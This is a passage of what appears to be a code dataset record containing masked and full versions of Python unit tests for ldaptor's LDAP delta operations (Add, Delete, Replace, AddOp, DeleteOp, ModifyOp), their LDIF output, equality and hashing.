delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-4": "<mask token>\n\n\nclass TestModifications(unittest.TestCase):\n\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',\n attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],\n 'sn': ['bar'], 'more': ['junk']})\n <mask token>\n\n def testAddNew(self):\n mod = delta.Add('stuff', ['val1', 'val2'])\n mod.patch(self.foo)\n self.assertEqual(self.foo['stuff'], ['val1', 'val2'])\n self.assertEqual(self.foo['cn'], ['foo', 'thud'])\n <mask token>\n <mask token>\n\n def testDelete_FailOnNonExistingAttributeType_All(self):\n mod = delta.Delete('notexist', [])\n self.assertRaises(KeyError, mod.patch, self.foo)\n <mask token>\n\n def testDelete_FailOnNonExistingAttributeValue(self):\n mod = delta.Delete('cn', ['notexist'])\n self.assertRaises(LookupError, mod.patch, self.foo)\n <mask token>\n <mask token>\n <mask token>\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace('nonExisting', [])\n mod.patch(self.foo)\n self.assertFalse('stuff' in self.foo)\n self.assertEqual(self.foo['sn'], ['bar'])\n self.assertEqual(self.foo['more'], ['junk'])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n\n def testAdd(self):\n m = delta.Add('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'add: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDeleteAll(self):\n m = delta.Delete('foo')\n self.assertEqual(m.asLDIF(), b'delete: foo\\n-\\n')\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n 
\"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n 
\"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': 
['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n 
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ 
Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n 
self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-5": "\"\"\"\nTest cases for ldaptor.protocols.ldap.delta\n\"\"\"\n\nfrom twisted.trial import unittest\nfrom ldaptor import delta, entry, attributeset, inmemory\nfrom ldaptor.protocols.ldap import ldapsyntax, distinguishedname, ldaperrors\n\n\nclass TestModifications(unittest.TestCase):\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(\n None,\n dn=\"cn=foo,dc=example,dc=com\",\n attributes={\n \"objectClass\": [\"person\"],\n \"cn\": [\"foo\", \"thud\"],\n \"sn\": [\"bar\"],\n \"more\": [\"junk\"],\n },\n )\n\n def testAddOld(self):\n mod = delta.Add(\"cn\", [\"quux\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\", \"quux\"])\n\n def testAddNew(self):\n mod = delta.Add(\"stuff\", [\"val1\", \"val2\"])\n mod.patch(self.foo)\n\n self.assertEqual(self.foo[\"stuff\"], [\"val1\", \"val2\"])\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\"])\n\n def testDelete(self):\n mod = delta.Delete(\"cn\", [\"thud\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\"])\n\n def testDeleteAll(self):\n mod = delta.Delete(\"more\")\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"cn\"], [\"foo\", \"thud\"])\n\n def testDelete_FailOnNonExistingAttributeType_All(self):\n mod = delta.Delete(\"notexist\", [])\n self.assertRaises(KeyError, mod.patch, self.foo)\n\n def testDelete_FailOnNonExistingAttributeType_OneValue(self):\n mod = delta.Delete(\"notexist\", [\"a\"])\n self.assertRaises(KeyError, mod.patch, self.foo)\n\n def testDelete_FailOnNonExistingAttributeValue(self):\n mod = delta.Delete(\"cn\", [\"notexist\"])\n self.assertRaises(LookupError, mod.patch, self.foo)\n\n def testReplace_Add(self):\n mod = delta.Replace(\"stuff\", [\"val1\", \"val2\"])\n mod.patch(self.foo)\n\n self.assertEqual(self.foo[\"stuff\"], [\"val1\", \"val2\"])\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n 
self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n def testReplace_Modify(self):\n mod = delta.Replace(\"sn\", [\"baz\"])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"baz\"])\n self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n def testReplace_Delete_Existing(self):\n mod = delta.Replace(\"more\", [])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n self.assertFalse(\"more\" in self.foo)\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace(\"nonExisting\", [])\n mod.patch(self.foo)\n\n self.assertFalse(\"stuff\" in self.foo)\n self.assertEqual(self.foo[\"sn\"], [\"bar\"])\n self.assertEqual(self.foo[\"more\"], [\"junk\"])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n def testAdd(self):\n m = delta.Add(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nadd: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testDelete(self):\n m = delta.Delete(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\ndelete: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testDeleteAll(self):\n m = delta.Delete(\"foo\")\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\ndelete: foo\n-\n\"\"\",\n )\n\n def testReplace(self):\n m = delta.Replace(\"foo\", [\"bar\", \"baz\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nreplace: foo\nfoo: bar\nfoo: baz\n-\n\"\"\",\n )\n\n def testReplaceAll(self):\n m = delta.Replace(\"thud\")\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nreplace: thud\n-\n\"\"\",\n )\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add(\"attr\", [\":value1\", \"value\\n\\r2\"])\n self.assertEqual(\n m.asLDIF(),\n b\"\"\"\\\nadd: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n\"\"\",\n )\n\n\nclass 
OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(\n dn=distinguishedname.DistinguishedName(\"dc=example,dc=com\")\n )\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(\n entry.BaseLDAPEntry(\n dn=\"dc=example,dc=com\",\n attributes={\n \"foo\": [\"bar\", \"baz\"],\n \"quux\": [\"thud\"],\n },\n )\n )\n\n result = sut.asLDIF()\n\n self.assertEqual(\n b\"\"\"dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n\"\"\",\n result,\n )\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=First Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=First Team, dc=example,dc=com\",\n attributes={\"foo\": [\"other\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, 
dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n sut = delta.AddOp(team_entry)\n\n self.assertNotEqual(sut, {\"foo\": [\"same\", \"attributes\"]})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"same\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"one\", \"attributes\"]},\n )\n second_entry = entry.BaseLDAPEntry(\n dn=\"ou=Duplicate Team, dc=example,dc=com\",\n attributes={\"foo\": [\"other\", \"attributes\"]},\n )\n\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(\n rdn=\"ou=Existing Team\",\n attributes={\n \"objectClass\": [\"a\", \"b\"],\n \"ou\": [\"HR\"],\n },\n )\n\n hr_entry = entry.BaseLDAPEntry(\n dn=\"ou=Existing Team, dc=example,dc=com\",\n attributes={\"foo\": [\"dont\", \"care\"]},\n )\n sut = delta.AddOp(hr_entry)\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(\n entry.BaseLDAPEntry(\n dn=\"dc=example,dc=com\",\n attributes={\n \"bar\": [\"foo\"],\n \"foo\": [\"bar\"],\n },\n )\n )\n\n 
self.assertEqual(\n repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', \"\n \"{'bar': ['foo'], 'foo': ['bar']}))\",\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp(\"dc=example,dc=com\")\n\n result = sut.asLDIF()\n self.assertEqual(\n b\"\"\"dn: dc=example,dc=com\nchangetype: delete\n\n\"\"\",\n result,\n )\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(\n stringValue=\"ou=Team,dc=example,dc=com\"\n )\n first = delta.DeleteOp(first_dn)\n\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example, dc=com\")\n second = delta.DeleteOp(second_entry)\n\n third = delta.DeleteOp(\"ou=Team, dc=example,dc=com\")\n\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Cowboys, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n sut = delta.DeleteOp(team_entry)\n\n 
self.assertNotEqual(sut, \"ou=Team, dc=example,dc=com\")\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\"ou=Team, dc=example,dc=com\")\n second_entry = entry.BaseLDAPEntry(dn=\"ou=Cowboys, dc=example,dc=com\")\n\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp(\"cn=nope,dc=example,dc=com\")\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp(\"dc=example,dc=com\")\n\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp(\n \"cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com\",\n [\n delta.Add(\n \"postaladdress\",\n [\"123 Anystreet $ Sunnyvale, CA $ 94086\"],\n ),\n delta.Delete(\"description\"),\n delta.Replace(\n \"telephonenumber\",\n [\"+1 408 555 1234\", \"+1 408 555 5678\"],\n ),\n 
